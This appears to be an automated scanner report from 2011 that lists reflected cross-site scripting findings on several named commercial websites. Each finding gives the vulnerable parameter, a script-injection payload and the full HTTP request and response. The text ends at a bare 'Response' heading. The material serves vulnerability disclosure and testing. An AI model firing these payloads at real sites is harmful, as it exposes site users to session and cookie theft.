<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <script type="text/javascript"> var Url = 'http://49631'-alert(1)-'9e2f0599833.directorym.net/s.aspx?s=affiliate448&a=448' var CId = 0; var RId = ''; var CIdDefault = 0; var RIdDefault = ''; var CL = new Array(); var RL = new Array(); RL[0] = n ...[SNIP]...
The value of the dm_set_regionlist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5fad'%3balert(1)//9e3059aac77 was submitted in the dm_set_regionlist parameter. This input was echoed as f5fad';alert(1)//9e3059aac77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ModuleG.aspx?dm_affiliate=448&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=f5fad'%3balert(1)//9e3059aac77&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url= HTTP/1.1 Host: aserve.directorym.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Cache-Control: private, max-age=86400 Date: Fri, 18 Feb 2011 15:22:12 GMT Connection: close Content-Length: 5690
<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <script type="text/javascript"> var Url = 'http://www.directorym.net/s.aspx?s=affiliate448&a=448' var CId = 0; var RId = 'f5fad';alert(1)//9e3059aac77'; var CIdDefault = 0; var RIdDefault = 'f5fad';alert(1)//9e3059aac77'; var CL = new Array(); var RL = new Array(); RL[0] = new Option("NY - Liverpool", "LER"); RL[1] = new Op ...[SNIP]...
The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 915d3<a%20b%3dc>bf11e275031 was submitted in the lc parameter. This input was echoed as 915d3<a b=c>bf11e275031 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /quant.swf?fpf=1%2D0%2D0&videoId=document%5Fembed%5Fplayer&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&doc=casestudynyplv08%2D110208115856%2Dphpapp02&publisherId=p%2DabU44ONrAuwk2&lc=%5F1298044537842%5F9208915d3<a%20b%3dc>bf11e275031&stripped%5Ftitle=hootsuite%2Din%2Dthe%2Dlibrary&qcv=2%2E1%2E1&pageURL=http%3A%2F%2Fblog%2Ehootsuite%2Ecom%2F&userName=hootsuite&flashPlayer=WIN%2010%2C2%2C154%2C12&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fdoc%5Fplayer%2Eswf%3Fdoc%3Dcasestudynyplv08%2D110208115856%2Dphpapp02%26stripped%5Ftitle%3Dhootsuite%2Din%2Dthe%2Dlibrary%26userName%3Dhootsuite&media=widget HTTP/1.1 Host: flash.quantserve.com Proxy-Connection: keep-alive Referer: http://static.slidesharecdn.com/swf/doc_player.swf?doc=casestudynyplv08-110208115856-phpapp02&stripped_title=hootsuite-in-the-library&userName=hootsuite Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EJkBBgGJBg
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: application/x-shockwave-flash Cache-Control: private, no-transform, max-age=86400 Expires: Sat, 19 Feb 2011 15:56:44 GMT Date: Fri, 18 Feb 2011 15:56:44 GMT Server: QS Content-Length: 4698
FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns ...[SNIP]... ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1298044537842_9208915d3<a b=c>bf11e275031.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=.. ..........O..............=................@................... . .................R....setUpLoc ...[SNIP]...
The value of the &CCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7bc4"><script>alert(1)</script>a0ea45578b5 was submitted in the &CCID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4"><script>alert(1)</script>a0ea45578b5&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:17 GMT Connection: close Set-Cookie: JSESSIONID=89625029A4CD9FF9F81EE602CF235862.app6-all2; Path=/ Set-Cookie: JSESSIONID=891E10200271FCF9A35D2D8BB89D5BD4.app6-all2; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:17 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033297081; Expires=Sat, 16-Feb-2019 12:48:17 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... SiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4"><script>alert(1)</script>a0ea45578b5&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56 ...[SNIP]...
The value of the &exp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c41be"><script>alert(1)</script>31799f5b297 was submitted in the &exp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=yc41be"><script>alert(1)</script>31799f5b297&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:20 GMT Connection: close Set-Cookie: JSESSIONID=38B899E6AE6CF116484B12AB1EF27BA0.app6-all2; Path=/ Set-Cookie: JSESSIONID=C0DD9B714801E591C905AAF4F207287E.app6-all2; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:20 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033300854; Expires=Sat, 16-Feb-2019 12:48:20 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... R=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=yc41be"><script>alert(1)</script>31799f5b297&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/> ...[SNIP]...
The value of the CCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfb8e"><script>alert(1)</script>dfcd6822df6 was submitted in the CCID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:12 GMT Connection: close Set-Cookie: JSESSIONID=0E36DD64A50C2D282E735CD156668F43.app6-all1; Path=/ Set-Cookie: JSESSIONID=E2550155D6E4EFD0579CBF2B167A9C8C.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6; Expires=Sat, 16-Feb-2019 12:48:12 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033292382; Expires=Sat, 16-Feb-2019 12:48:12 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&ex ...[SNIP]...
The value of the CLK request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e01a"><script>alert(1)</script>d5e0b5efd26 was submitted in the CLK parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180447168181e01a"><script>alert(1)</script>d5e0b5efd26&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:15 GMT Connection: close Set-Cookie: JSESSIONID=97488A1C53BFAFB108423AFF2D7F92C9.app5-all1; Path=/ Set-Cookie: JSESSIONID=AA06C727F48CC5BA4A08EED6D6E7F962.app5-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:15 GMT; Path=/ Set-Cookie: CLK=0#1298033295843; Expires=Sat, 16-Feb-2019 12:48:15 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... dorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180447168181e01a"><script>alert(1)</script>d5e0b5efd26&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf2010040619 ...[SNIP]...
The value of the InternalReferralURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac76"><script>alert(1)</script>45061f4f32c was submitted in the InternalReferralURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=aac76"><script>alert(1)</script>45061f4f32c&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:23 GMT Connection: close Set-Cookie: JSESSIONID=A5BFF0A049DAE2062A18A05DB6808013.app6-all2; Path=/ Set-Cookie: JSESSIONID=6C9BC97FBF58D500C46BFF41AD62167E.app6-all2; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:23 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033303466; Expires=Sat, 16-Feb-2019 12:48:23 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... 91Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=aac76"><script>alert(1)</script>45061f4f32c&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/> ...[SNIP]...
The value of the LeadSiteURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33571"><script>alert(1)</script>d012466242a was submitted in the LeadSiteURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?33571"><script>alert(1)</script>d012466242a&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:11 GMT Connection: close Set-Cookie: JSESSIONID=5745F7537F6FF26244F0BBF2D83D9195.app6-all1; Path=/ Set-Cookie: JSESSIONID=D08D1E17C3723FAE8D5F6D0ADAD078E0.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:11 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033291167; Expires=Sat, 16-Feb-2019 12:48:11 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... Sheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?33571"><script>alert(1)</script>d012466242a&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK ...[SNIP]...
The value of the QTR request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da96"><script>alert(1)</script>f7d751f0855 was submitted in the QTR parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ3da96"><script>alert(1)</script>f7d751f0855&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
